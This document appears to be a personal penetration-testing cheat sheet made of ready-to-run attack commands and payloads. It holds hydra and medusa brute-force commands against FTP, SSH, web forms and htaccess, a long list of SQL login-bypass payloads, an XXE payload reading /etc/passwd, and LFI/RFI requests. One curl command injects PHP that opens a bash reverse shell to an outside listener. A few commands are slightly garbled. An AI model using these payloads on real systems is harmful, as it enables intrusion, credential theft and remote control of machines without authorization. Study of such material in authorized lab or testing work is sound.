Attacks

attack ftp

ftp server :

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 

Brute force ssh

hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22:22 - 22 -M ss 

SQL Injection

 sheet with the Burp Suite Intruder Module. This list is an extended version of SQL Login Bypass Cheat Sheet of Dr. Emin İslam TatlıIf (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*

XXE

<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>

LFI

See the source of any php

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index

RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1
') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"

Brute force Web

hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie : PHPSESSID=bq8vrl6updklfdvv21reb8s63j"

htaccess brute force

medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10